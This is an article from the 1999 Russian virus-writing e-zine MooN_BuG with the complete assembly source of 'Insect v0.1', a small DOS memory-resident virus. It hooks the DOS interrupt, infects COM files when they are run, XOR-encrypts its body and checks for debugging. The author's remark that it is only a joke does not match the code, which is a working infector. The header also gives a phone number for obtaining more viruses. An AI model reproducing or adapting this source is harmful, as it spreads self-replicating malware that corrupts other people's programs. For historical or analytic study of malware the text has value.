[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999 file 00B
Insect v0.1 tiny virus
by B!Z0n
Это не виpyс, это сплошной пpикол, пpосто наглая заготовка, поэтомy веб
его не видит ;-) Посмотpите, но не пpинимайте всеpьез.
=== Cut === ins_bzz.asm
; 17.03.1999
; Insect v0.1 tiny virus (c) B!Z0n //[BzZ]
;
; 4 more viruses call BaDhEAD station
; Phone: 7-812-524-5789 23:00-08:30
;
; good luck to you!
;
model tiny
codeseg
startupcode
p286
start:
int 12h
shl ax, 6
dec ax
push ax
mov es, ax
mov cx, crypted-decryptor
lea si, decryptor
mov di, si
push si
rep movsb
retf
decryptor:
push es
push ds si ds
pop es
mov cx, finish-crypted
mov ah, byte ptr [crypted]
xor ah, 90h
push ax
in ax, 42h
mov dx, ax
in ax, 42h
cmp ax, dx
pop ax
jne @lab1
retf
@lab1:
lodsb
xor al, ah
stosb
loop @lab1
retf
crypted:
nop
mov ax, 1999h
int 21h
jnc install
jmp exit
install:
mov ax, 3521h
int 21h
mov word ptr [old21h], bx
mov word ptr [old21h+2], es
mov ax, 2521h
lea dx, newint
int 21h
lea dx, finish + (finish-start)
int 27h ;) Внаглую!!!! ;)))
;------------------------------------------------------------------
VirusName db 0,0,'Insect v0.1'
Copyright db 0,'(c) B!Z0n //[BzZ]',0,0
;------------------------------------------------------------------
newint:
push ax
pushf
sub ah, 19h
jne no_vir
cmp al, 99h
jne no_vir
stc
pop ax ax
retf 0002
no_vir:
sub ah, (4Bh-19h)
jne oldint
EXEC: or al, al
jne oldint
INFECT:
;---------------------------
push es ds bx cx dx di si
open:
mov ax, 3d02h
int 21h
jc err_exit
xchg ax, bx
read:
push cs cs
pop ds es
mov ah, 3fh
mov cx, finish-start
lea dx, finish
int 21h
jc err_exit
cmp word ptr finish, 'ZM' ; EXE'шник?
je err_exit
cmp word ptr finish, 012CDh ; уже инфицирован?
je err_exit
cmp ax, finish-start ; программа больше чем вирус?
jb err_exit
push ax
write_end:
mov al, 02h ;(((((((((((
call lseek
mov si, OFFSET start
add ax, si
mov word ptr [heap], ax
mov ah, 40h
pop cx
lea dx, finish
push dx
int 21h
modyfic:
pop di
mov cx, crypted-start
rep movsb
mov cx, finish-crypted
in ax, 40h
@lab2:
lodsb
xor al, ah
stosb
loop @lab2
write_start:
xor al, al
call lseek
mov ah, 40h
lea dx, finish
mov cx, finish-start
int 21h
err_exit:
mov ah, 3eh
int 21h
pop si di dx cx bx ds es
;---------------------------
oldint:
popf
pop ax
db 0EAh
;---------------------------
old21h db 4 DUP(?)
;---------------------------
Lseek:
mov ah, 42h
xor cx, cx
cwd
int 21h
ret
exit:
pop es
lea si, exit_1
mov di, 100h
push es di
mov cx, finish-exit_1
rep movsb
retf
exit_1:
push ds
pop es
mov si, 0000h
heap equ $-2
mov di, 100h
push ds di
mov cx, finish-start ; viruslen
rep movsb
retf
finish:
mov ah, 4ch
int 21h
end
;
;
=== Cut ===
